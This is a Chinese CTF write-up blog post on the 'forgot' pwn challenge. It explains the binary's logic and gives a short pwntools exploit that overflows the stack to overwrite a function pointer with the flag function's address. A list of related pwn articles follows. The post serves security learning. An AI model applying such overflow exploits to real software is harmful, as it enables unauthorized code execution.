[pwn]逻辑复杂利用简单

最新推荐文章于 2021-11-07 10:51:37 发布
最新推荐文章于 2021-11-07 10:51:37 发布
阅读量7.5k 收藏 1
点赞数 1
分类专栏: 二进制 ctf # ctf-pwn 文章标签: 安全 二进制安全 ctf pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Breeze_CAT/article/details/100086845
版权
二进制 同时被 3 个专栏收录
56 篇文章 17 订阅
订阅专栏
ctf
30 篇文章 3 订阅
订阅专栏
ctf-pwn
25 篇文章 4 订阅
订阅专栏

逻辑复杂利用简单的pwn

遇到了一道坑有很多的题,记录一下。题目:forgot,题目地址:forgot

首先查看安全策略
在这里插入图片描述
不是很高,就一个NX,看看代码逻辑吧,直觉告诉我并不简单:
在这里插入图片描述
在这里插入图片描述
一张图放不下,其实有溢出,但我由于主函数太长了还一堆小函数,没注意(吓到了)。中间switch之中的一堆小函数都是判断是不是字母、数字、下划线之类的,比如:
在这里插入图片描述
在这里插入图片描述
而且最后有个调用:
在这里插入图片描述
调用的值又和v14有关,导致我没有最开始仔细分析如何调用而去分析上面那个switch的逻辑了,其实就是根据用户输入的字符串的格式不同给v14赋不同的值。完整的逻辑是一个类似邮箱的字符串cat@cat.com这种,就会让v14值为10,其他的根据完整成都值不同。最后调用V3+v14-1这个地址。在上面代码中可以看出,v3-v12都在最开始赋了一个函数,都是一些输出字符串的函数。 这里看反汇编代码不好明白这个是怎么计算的,直接看汇编代码:
在这里插入图片描述
将v14-1,然后调用v3变量下面v14值对应的变量指向的函数。由于小函数实在太多,我没有一个一个去看,通过string表发现了一个函数:
在这里插入图片描述
函数有了,然后发现逻辑只要我们输入的字符串前面是小写字母并且之中没有@,那么v14的值就一直是2,最后减1编程1,最后调用的就是v4,溢出点在:
在这里插入图片描述
计算v2和v4的相对位移,然后覆盖就好,具体看exp:

from pwn import *

p=process("./3d000793d15b444ab46e99e165e9454b")

flag_addr=0x80486CC
payload='a'*0x24+p32(flag_addr)

print p.recv()
p.sendline("chen")
print p.recv()
p.sendline(payload)
print p.recv()

可谓一顿操作猛如虎,一看溢出一步走!
在这里插入图片描述

breezeO_o
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN基础2:基础理论
prettyX的博客
07-04 831
基础理论 part 1 1、在CTF比赛中,PWN主要是指漏洞利用,也称为exploit。 2、PWN题型的解题过程一般是寻找程序中存在的漏洞,并利用该漏洞达到一定的效果,如拿到shell、获取flag等。 3、解答PWN题型的基本能力包括:程序逆向能力、漏洞查找能力、利用代码编写能力。 4、PWN题型中的漏洞类型主要可以分为栈漏洞、堆漏洞、格式化字符串漏洞、整形漏洞、逻辑漏洞等。 5、就难易程度来说,栈漏洞、格式化字符串漏洞、整形漏洞的难度要低于堆漏洞、逻辑漏洞。 6、就考察点来说,栈漏洞、
业务逻辑复杂的SQL语句大全
11-01
适用于工业复杂业务逻辑的场景使用。多年MES开发经验所总结。无数据库表,表名靠自己领悟,重要的在于语法与思考方向指导。
pwn学习日记Day16 pwn原理理解
anxiong1803的博客
05-12 502
CTF-Pwn入门及栈溢出原理解释 CTF pwn 中最通俗易懂的堆入坑指南 看雪论坛 转载于:https://www.cnblogs.com/luoleqi/p/10853678.html
PWN综合
WateranFire的博客
09-18 290
感觉pwn的知识比较繁杂,列个目录记录下 堆 bins介绍https://www.cnblogs.com/alisecurity/p/5520847.html 绕过 pie绕过https://blog.csdn.net/WateranFire/article/details/100984579 ...
bugku ctf pwn1 (nc 114.116.54.89 10001)
热门推荐
qq_42777804的博客
06-17 1万+
nc 114.116.54.89 10001 在Linux里面运行 nc 114.116.54.89 10001 ( nc命令用于设置路由器。) 之后用 ls -l 命令 (ls命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。) (-l 除文件名称外,亦将文件型态、权限、拥有者、文件大小等资讯详细列出) 发现flag 使用命令 :...
pwn100题目文件及exp.zip
08-09
在IT安全领域,尤其是逆向工程和漏洞利用中,“pwn”是一个常见的术语,它涵盖了对软件漏洞的利用,特别是那些允许攻击者获得系统控制权的漏洞。本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)...
基于FPGA的PWN输出实现
12-18
【PWM技术概述】 PWM,全称为脉冲宽度调制(Pulse Width ...总结来说,通过FPGA利用Verilog实现PWM输出,不仅能够满足高性能和实时性要求,还能够灵活地适应各种应用需求,体现出FPGA在数字信号处理领域的强大潜力。
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
最新发布
09-23
它支持数据类型、操作符、结构体以及过程语句,使得描述复杂的数字系统变得简单。 **PWM信号** 是一种常用于控制功率输出、模拟信号生成和通信的技术。它通过改变周期内高电平持续时间(占空比)来表达一个模拟值,...
一个实例讲解fastbins上的堆利用附件
09-06
最后,`exp.py`是一个Python脚本,很可能包含了利用漏洞的代码逻辑,例如创建伪造的对象,操纵内存布局,以及最终执行任意代码。 为了彻底理解这个实例,你需要分析`exp.py`脚本,查看它如何构造输入以触发特定的堆...
gef-extras:GEF的额外优惠
03-31
Python是一种广泛用于自动化和脚本化的语言,其在调试工具中的应用使得用户可以自定义复杂的调试逻辑,创建新的命令和功能。 **Linux调试** 在Linux操作系统中,gef-extras使得GDB能够更好地适应现代调试需求。它...
逻辑漏洞篇
xiaoka__的博客
11-07 153
功能越多的网站,开发员出现疏忽的可能性越大,逻辑漏洞就越容易发现。 逻辑漏洞的分类:权限问题,数据问题 一、权限问题 权限问题可分为三种:未授权访问,越权访问,用户验证缺陷。 1.未授权访问: 有一个内容需要用户验证才可以获得,但没有对用户进行身份验证,用户就可以获得该内容,这是由于开发时未添加身份验证步骤。 2.越权访问 横向越权:相同级别的用户之间的访问 纵向越权:普通用户可以实现管理员用户的功能 3.用户验证缺陷 感觉和越权的目的差不多,都是得到其他用户的权限。 用户验证缺陷包含多个部分,包括登录体系
看雪pwn入门--基础篇
泣当歌的计算机小白之路
03-28 2640
1.pwn理论基础  小菜: 什么是溢出 概念:在计算机中,当要表示的数据超出计算机使用的数据表示范围时,产生数据的溢出 原因:使用非类型安全的语言入C/C++等            以不可靠的方式存取或者复制内存缓冲区            编译器设置内存缓冲区太靠近关键数据结
【学习笔记】CTF PWN选手的养成(四)其他漏洞 && 从CTF到实战
prettyX的博客
12-06 1478
0X01 格式化字符串 1、格式化串介绍:https://en.wikipedia.org/wiki/Printf_format_string 2、格式化串相关函数:printf、fprintf、sprintf等 3、格式化漏洞: 触发形如printf(fmtstr)的调用,fmtstr="%$22p"时可以打印栈指针之后第22个DWORD,fmtstr="%1000c%22n"时可以将栈...
巅峰极客第一场CTF部分writeup
郁离歌丶的博客
07-22 6050
额,上午驾校学车,中午打了会儿安恒的月赛,就来看巅峰极客的题了。时间关系实力原因没做几个emmmm太菜了wa MISC-warmup-100pt 拿到一个bmp文件,套路走一波,右键查看属性emmm啥都没有。 丢到winhex里面也没有什么明显的提示或者信息。 放大招:stegsolve。放在各个颜色通道里面过一遍。 可以明显的看到每个颜色通道的最低位有异常数据。 将数据提取出来 ...
PWN 学习—某平台ROP2 writeup
SNAKEのBlog
08-01 457
64位栈帧学习 writeup 本能反应 RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过 NX:NX enabl...
CTF-PWN-level1(Jarvis oj)[栈上shellcode的执行]
SuperGate的博客
02-14 829
checksec发现没有开保护机制,所以我们可以考虑使用shellcode方法pwn掉。 查看vulnerable_function函数内部 发现程序直接给我们了buf的首地址。点进去看之后发现,buf只能存0x88个字符,但是我们可以读入0x100个字符。由于读入的时候字符串会暂时存在栈上,我们可以考虑覆盖return的地址到buf的首地址中,然后在buf首地址开始写入shellcode...
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4123
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
记第一次解PWN题目
天道酬勤
09-02 516
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器附加该程序 #gdb.att...
pwn,获取系统权限,入门题,cyclic
SanOrintea的博客
09-01 6441
输入【./ret2text】运行程序,发现让你输入,那么我们先随便输入个【123456】,程序结束了。 用ida打开这个程序,发现有‘system’函数,还可以输入,那么就可以利用栈溢出获取系统权限。 首先先多输入点,看看什么时候溢出,这里用cyclic有序字符串。 输入【cyclic 200】生成200个有序字符。 用gdb打开ret2text,输入【gdb ret2te...
二进制利用入门:Pwn挑战解析
网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的pwn挑战感兴趣的读者准备的。 首先,让我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值